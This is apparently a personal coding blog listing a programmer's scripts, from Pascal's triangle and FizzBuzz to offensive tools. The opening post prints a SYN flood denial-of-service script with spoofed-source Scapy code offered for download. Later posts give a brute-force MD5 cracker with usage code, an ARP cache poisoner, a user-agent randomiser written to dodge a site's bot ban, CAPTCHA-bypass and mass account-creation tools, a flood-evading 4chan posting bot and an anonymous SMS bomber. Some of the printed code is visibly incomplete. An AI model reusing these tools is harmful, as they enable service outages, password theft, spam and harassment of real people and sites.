A Blog About Anime, Code, and Pr0 H4x

Table of Contents

SYNFlood.py - A multithreaded SYN Flooder
Pokebot (poh-kay-bot) - A Facebook Poke Autoresponse Bot
Randomized User Agent Header Generator
Gentle Brute
phpBB Automated Account Creator
Decaptcher API Python Module
Random Username Generator
Pascal's Triangle in 15 Lines
Operation Sharada Sharada
Look-And-Say Sequence Generator
Operation Jupiter Jazz
SMS Final Smash!
ARP Cache Poisoner
Port Scanner
Password Generator in Two Lines
Speaker Beep
CDYNE SMS Notify! Python Module
Operation Image Faerie
Fortune Grabber

SYNFlood.py - A multithreaded SYN Flooder

January 18, 2013 at 12:00 PM

I wrote this script a long time ago when I was just starting to learn about networking basics. During that time, I came across a Python library that makes it easy to craft and manipulate network traffic at a packet level by the name of Scapy.

I wrote this script as a demonstration of a SYN/ACK Three Way Handshake Attack as discussed by Halla of Information Leak in an article that has since mysteriously disappeared from his site. I also mentioned this script in an article I wrote about hacking gibsons or something to that effect, that I have since removed form this site because the writing in it was atrocious. (Well it was written by a ninth grader, so that's not a huge surprise.)

Anyway, aside from searches for the phrase "How can you say you love her if you can't even eat her poop?" (oh yeah, I'm an SEO master), the majority of external search engine hits to my website come from people looking for this script. Therefore, I decided I'd spruce it up a touch, and repost it in all of its glory here.

So without further adieu, gaze and behold!

#!/usr/bin/env python
          # SYNflood.py - A multithreaded SYN Flooder
          # By Brandon Smith
          # brandon.smith@studiobebop.net
          # This script is a demonstration of a SYN/ACK 3 Way Handshake Attack
          # as discussed by Halla of Information Leak
          import socket
          import random
          import sys
          import threading
          #import scapy # Uncomment this if you're planning to use Scapy
          # Global Config
          interface    = None
          target       = None
          port         = None
          thread_limit = 200
          total        = 0
          #!# End Global Config #!#
          class sendSYN(threading.Thread):
                  global target, port
                  def __init__(self):
                  def run(self):
                          # There are two different ways you can go about pulling this off.
                          # You can either:
                          #   - 1. Just open a socket to your target on any old port
                          #   - 2. Or you can be a cool kid and use scapy to make it look cool, and overcomplicated!
                          # (Uncomment whichever method you'd like to use)
                          # Method 1 -
          #               s = socket.socket()
          #               s.connect((target,port))
                          # Methods 2 -
          #               i = scapy.IP()
          #               i.src = "%i.%i.%i.%i" % (random.randint(1,254),random.randint(1,254),random.randint(1,254),random.randint(1,254))
          #               i.dst = target
          #               t = scapy.TCP()
          #               t.sport = random.randint(1,65535)
          #               t.dport = port
          #               t.flags = 'S'
          #               scapy.send(i/t, verbose=0)
          if __name__ == "__main__":
                  # Make sure we have all the arguments we need
                  if len(sys.argv) != 4:
                          print "Usage: %s <Interface> <Target IP> <Port>" % sys.argv[0]
                  # Prepare our variables
                  interface        = sys.argv[1]
                  target           = sys.argv[2]
                  port             = int(sys.argv[3])
          #       scapy.conf.iface = interface # Uncomment this if you're going to use Scapy
                  # Hop to it!
                  print "Flooding %s:%i with SYN packets." % (target, port)
                  while True:
                          if threading.activeCount() < thread_limit:
                                  total += 1
                                  sys.stdout.write("\rTotal packets sent:\t\t\t%i" % total)

Download: SYNFlood.py

Pokebot (poh-kay-bot) - A Facebook Poke Autoresponse Bot

January 3, 2013 at 12:00 PM

== Source code available on my Github. ==

A friend of mine asked me to write him a bot that would automatically poke back anyone who poked him on Facebook, so that's what I did.

This bot doesn't make use of any of the actual Facebook APIs, but instead performs all of its actions by mimicking the behavior of an actual web browser. I designed it this way for three reasons.

  1. I was bored and enjoy a challenge.
  2. It takes me back to my days as a freelance spam bot developer.
  3. Working with official APIs can be messy when you have to deal with getting access tokens, and the possibility of having your access revoked if your actions are deemed excessive. So while it's not nearly as straight forward as working with the official API, mimicking a web browser does have its perks.



Assuming you meet all the requirements listed above, all you need to do is run main.py Pokebot will ask for your Facebook email and password, as well as an amount of time to wait between checking for pokes. Once all of that information is squared away, Pokebot will run on a continuous loop until you tell it to stop.

== Source code available on my Github. ==

Randomized User Agent Header Generator

October 24, 2012 at 12:00 PM

I put together a scraping bot for a website I frequent occasionally, but they got wise to my Python shenanigans after I released the source code (who'd have thought?), so I had to step up my bot code a bit.

After some tinkering I found that they had just blacklisted the user agent header I was using for the script, instead of doing something more effective like setting access timers between page requests, or getting strict on referer headers, or just banning my account.

But I digress...

Since all they did was ban the user agent string I was using before, all I had to do was change it , and I was back in business. But in the long run this isn't really the best solution since they could always just ban the user agent header again. So instead I decided to throw together a quick Python function that generates a randomized, realish looking user agent header.

Gaze and behold!

def get_random_useragent():
              base_agent = "Mozilla/%.1f (Windows; U; Windows NT 5.1; en-US; rv:%.1f.%.1f) Gecko/%d0%d Firefox/%.1f.%.1f"
              return base_agent % ((random.random() + 5),
                               (random.random() + random.randint(1, 8)), random.random(),
                               random.randint(2000, 2100), random.randint(92215, 99999),
                               (random.random() + random.randint(3, 9)), random.random())
          >>> print get_random_useragent()
          Mozilla/5.2 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2009098692 Firefox/
          >>> print get_random_useragent()
          Mozilla/5.5 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2006095233 Firefox/
          >>> print get_random_useragent()
          Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2064093484 Firefox/
          >>> print get_random_useragent()
          Mozilla/5.6 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2063099117 Firefox/

I hope someone out there besides me can find a use for this.

Download: random_useragent.py

Gentle Brute

December 3, 2011 at 12:00 PM

== Source code available on my Github. ==

One of the major drawbacks to using a brute force attack to crack a password, is that it can literally take billions of years (if not more) to try all of the possible permuations of a user's password. One way to cut down on this, is to skip trying passwords that would be unlikely for a target user to have. (Things like 'aaaaaa', 'asdf7777772dn', etc) Gentle-Brute is a Ruby gem designed to generate only "English-like" words and phrases for more heuristic brute force password cracking attacks. An English-like word is a sequence of characters that may not necessarilly be an actual English word, but still adheres to the "rules" of English words. By only using these kinds of words and phrases when attempting to crack a password with brute force, it's possible to greatly reduce amount of time it takes to find a matching hash.

What are the "Rules" of English-like words and phrases?

Please see my article Building the Better Brute Force Algorithm - A Guide to Heuristic Password Cracking for a detailed explanation of this subject.



gem install gentle_brute


git clone git@github.com:jamespenguin/gentle-brute.git
          gem build gentle_brute.gemspec
          gem install gentle_brute-<version>.gem


Gentle-Brute includes a handy dandy pre-written application (GentleBrute) for crackng MD5 hashes, or you can write your own custom password cracking programs.

Using GentleBrute

~/GentleBrute --help
          GentleBrute [options]
                  --word-list                Generate a word list of valid English-like words and phrases for a given length
                  --cross-compare-crack      Cross compare brute force cracking times for a given md5 hash between GentleBrute, and regular brute forcing.
                  --validate                 Test whether a given word or phrase is considered valid
                  --crack-md5                Crack a single MD5 password hash
                  --crack-md5-list           Crack a series of MD5 password hashes in a given file
                  --rainbow-table            Build MD5 hash rainbow table
              -h, --help                     Print this help message

Writing Your Own Password Cracker

require 'digest/md5'
          require 'gentle_brute'
          target_hash = '58e53d1324eef6265fdb97b08ed9aadf'
          b = GentleBrute::BruteForcer.new
          while true
            phrase = b.next_valid_phrase
            attempt_hash = Digest::MD5.hexdigest(phrase)
            puts "Password is #{phrase}" if attempt_hash == target_hash
            break if attempt_hash == target_hash

Is there really a big difference in speed?

You bet there is!

But does it really work?

See for yourself!

gem install gentle_brute
          wget https://raw.github.com/jamespenguin/gentle-brute/master/passwords.txt
          GentleBrute --crack-md5-list passwords.txt

== Source code available on my Github. ==

phpBB Automated Account Creator

November 14, 2011 at 12:00 PM

This is a Python project I cooked up a month ago to automate the process of creating user accounts on phpBB forums.

It supports automated CAPTCHA solving using Decaptcher.com

You can get the source code from my Github repository.


October 13, 2011 at 12:00 PM

Pydget is a Python powered application for (mostly) automating the process of downloading files from various file hosting websites. Also, Pydget was and still is developed primarily on an iPad using nano and a copy of Python compiled to run on iOS.

Supported Websites

Pydget can be used to dwonload files from:


  • Better command line and user interface stuff
  • Fine tune downloading scripts
  • Add support for more hosting websites
  • Automate CAPTCHA input using Decaptcher.com


usage: pydget.py [-h] [--pause] [--save-to path] URL [URL ...]
          Pydget - Automate (for the most part) downloading files from file hosting websites!
          positional arguments:
            URL             One or more URLs to download files from
          optional arguments:
            -h, --help      show this help message and exit
            --pause         Wait for user input after a file finishes downloading,
                            before beginning the next download.
            --save-to path  Save downloaded files to a specific folder.

Download Pydget from my Github Repository!

Decaptcher API Python Module

October 13, 2011 at 12:00 PM

Decaptcher is a website that offers automated CAPTCHA image solving for the price of a fraction of a penny per image. They offer round the clock CAPTCHA solving, which they claim is all done by humans over on their end, which leads me to believe that there is some massive sweatshop somewhere in India wherein there are several hundred small children being forced to solve CAPTCHAs all day. Oh well, it makes for a great tool for writing bots.

Decaptcher doesn't have an official Python API, so I cooked up my very own based off of their terrible documentation, enjoy!

Usage Example

import decaptcher
          d = decaptcher("username", "password")
          print "You have $%.2f left on your Decaptcher balance." % d.get_balance()
          print "CAPTCHA image answer is: %s" % d.solve_image(path_to_image_file)

This module requires Requests

Download: decaptcher.py

Random Username Generator

October 13, 2011 at 12:00 PM

This is a small script for generating random, unique, and realistic looking usernames on the fly.

You will need to have both adjectives.txt and nouns.txt in the same directory as this script for it to work.

Download: generate_username.py

Pascal's Triangle in 15 Lines

October 10, 2011 at 12:00 PM

The title pretty much says it all, this script will generate Pascal's triangle to however many lines you tell it to.

last_line = [1]
          line_len = 1
          for i in range(input("How many lines you want!?: ")):
              if i == 0:
                  print last_line
              line_len += 1
              new_line = []
              for a in range(line_len):
                  if a == 0 or a == line_len - 1:
                  new_line.append(last_line[a] + last_line[a-1])
              print new_line
              last_line = new_line

Operation Sharada Sharada

October 10, 2011 at 12:00 PM

Operation Sharada Sharada is an application designed to retrieve all proxies listed on Saimar.ru. At launch, it determines what is the last available page of proxies, and then iterates over that range retrieving the proxies from each page. All results are then dumps the results for each page into a file named proxies.txt.

Operation Sharada Sharada is designed to be used either as a stand alone application, or as a module in other applications. If you take a look under the __main__ section of the source code, you will see an example implementation of Sharada.

Operation Sharada Sharada requires BeautifulSoup

Download: sharada.py

Look-And-Say Sequence Generator

October 10, 2011 at 12:00 PM

This program generates a look-and-say sequence to however many lines it's instructed to do.

Example output:

bossman:/code/python$ ./lookandsay.py
          lines: 10

Download: lookandsay.py

Operation Jupiter Jazz

October 10, 2011 at 12:00 PM

Operation Jupiter Jazz is a 4chan image dumping tool. When launched, you will be prompted to select an image board to upload to, as well as given the option to provide a custom name, subject, and/or email address. With each post, the bot also appends a randomly chosen quote from either Anime Lives, or a static list of quotes located at the top of anime_quotes.py. This is to avoid being flagged for flooding, and to keep the posts interesting. As of version 1.3, the current one, Operation Jupiter Jazz now supports full control over name choosing. You can post as anonymous, use a tripcode, or whatever else you can think of to shove in the name field.



October 10, 2011 at 12:00 PM

This is just a little simon game I wrote on my way to Utah for my fall semester of college. It's not nearly as neat/well coded as my other projects, but it's still fun. My high score was 240.

Download: simon says.py

SMS Final Smash!

October 10, 2011 at 12:00 PM


  • Support for 94 different service providers
  • Fully configurable SMTP settings
  • Completely rewritten GUI
  • Anonymous message sending
  • Damage cost calculator

Download: smsfinalsmash.py

Supported Providers:

  • Airadigm Communications
  • Aliant
  • Alltel
  • Ameritech
  • BeeLine GSM
  • Bell Mobility Canada
  • Bellsouth
  • Bellsouth IPS
  • Bellsouth Mobility
  • Blue Sky Frog
  • Boost Mobile
  • Cellular South
  • CellularOne (Dobson)
  • CellularOne West
  • Cincinnati Bell
  • Cingular
  • Cingular Blue (formerly AT&T Wireless)
  • Cingular IM Plus
  • Claro
  • Comviq
  • Dutchtone
  • EPlus
  • Edge Wireless
  • EinsteinPCS
  • Fido Canada
  • Golden Telecom
  • Idea Cellular
  • Island Tel
  • Kyivstar
  • LMT
  • MTT
  • Manitoba Telecom
  • Meteor
  • Metro PCS
  • Metrocall Pager
  • MobileOne
  • Mobilfone
  • Mobility Bermuda
  • NBTel
  • NPI Wireless
  • Netcom
  • NewTel
  • Nextel
  • Optus
  • Orange-NL
  • Oskar
  • PSC Wireless
  • Pacific Bell Cingular
  • Pagenet
  • Plus GSM Poland
  • Powertel
  • Primtel
  • Qwest
  • SCS-900
  • Safaricom
  • Satelindo GSM
  • Simple Freedom
  • Smart Telecom
  • Southern Linc
  • Sprint PCS
  • SunCom
  • SureWest Communications
  • SwissCom Mobile
  • T-Mobile Germany
  • T-Mobile UK
  • T-Mobile USA
  • TIM
  • Tele2 Latvia
  • Telefonica Movistar
  • Telenor
  • Telia Denmark
  • Telus Mobility
  • The Phone House
  • UMC
  • Unicel
  • Verizon Wireless
  • Vessotel
  • Virgin Mobile Canada
  • Virgin Mobile USA
  • Vodafone Italy
  • Vodafone Japan (Chuugoku/Western)
  • Vodafone Japan (Hokkaido)
  • Vodafone Japan (Hokuriko/Central North)
  • Vodafone Japan (Kansai/West, including Osaka)
  • Vodafone Japan (Kanto/Koushin/East, including Tokyo)
  • Vodafone Japan (Kyuushu/Okinawa)
  • Vodafone Japan (Shikoku)
  • Vodafone Japan (Touhoku/Niigata/North)
  • Vodafone Japan (Toukai/Central)
  • Vodafone Spain
  • Vodafone UK
  • Weblink Wireless
  • WellCom
  • WyndTell

ARP Cache Poisoner

October 10, 2011 at 12:00 PM

This is a multithreaded ARP cache poisoner capable of poisoning a single host or range of hosts based on command line arguments.

Download: poisonARP.py

Port Scanner

October 10, 2011 at 12:00 PM

This is a port scanner I wrote back when I was just learning how to use the threading module. It scans a single host for all possibly opened TCP ports. The output on it is pretty neat IMHO what with all the carrige returning and whatnot, so check it out.

Download: portscan.py


October 10, 2011 at 12:00 PM

Another response for yet another program challenge on Information Leak. This program prints the numbers from 1 to 100. But for multiples of three prints "Fizz" instead of the number and for the multiples of five prints "Buzz" and fornumbers which are multiples of both three and five prints "FizzBuzz."

Download: fizzbuzz.py

Password Generator in Two Lines

October 10, 2011 at 12:00 PM

The following piece of code was an experiment with lambda functions, and seeing how short I could make the code.

import random
          print "".join(map(chr,map(lambda x: random.randint(33,127),range(input('len: ')))))

Speaker Beep

October 8, 2011 at 12:00 PM

This is a Python module that can play noises on a motherboard's internal speaker on computers running Windows.


# Play the Final Fantasy victory medley
          import speaker_beep
          octave = 4
          speaker_beep.play_note(octave + 1, "c", "triplet")
          speaker_beep.play_note(octave + 1, "c", "triplet")
          speaker_beep.play_note(octave + 1, "c", "triplet")
          speaker_beep.play_note(octave + 1, "c", "quarter")
          speaker_beep.play_note(octave, "g#", "quarter")
          speaker_beep.play_note(octave, "a#", "quarter")
          speaker_beep.play_note(octave + 1, "c", "dotted_eigth")
          speaker_beep.play_note(octave, "a#", "sixteenth")
          speaker_beep.play_note(octave + 1, "c", "whole")

Download: speaker_beep.py

CDYNE SMS Notify! Python Module

October 8, 2011 at 12:00 PM

This is a spiffy drop-in Python module for interacting with the CDYNE SMS Notify! web API. For more information, see the CDYNE SMS Notify! website.


Add the module somewhere where your project will be able to get at it, and use it like so.

import sms_notify
          license_key = "" # Put your SMS Notify license key here
          sms = sms_notify.session(license_key)
          # Send a message
          phone_number = "30355512345"
          message = "This is a test message"
          sms.simple_sms_send(phone_number, message)
          # Get unread messages sent to the DID associated with your license key
          messages = sms.get_unread_incoming_messages()
          for message in message:
              print message

Download from my Github Repository!

Operation Image Faerie

October 8, 2011 at 12:00 PM

Operation Image Faerie is an image scraping suite that currently supports five different anime related websites. These websites are Danbooru, E-ShuuShuu, Konachan, Moe Imouto, and Sankaku complex. Each scraping application includes the option to filter out NSFW pictures, and downloads images in parallel.


Fortune Grabber

October 8, 2011 at 12:00 PM

Fortune Grabber is a Python script that grabs random forutne cookie sayings from FortuneCookieMessage.com

This script requires BeautifulSoup

Download: fortune_grabber.py

Go to Page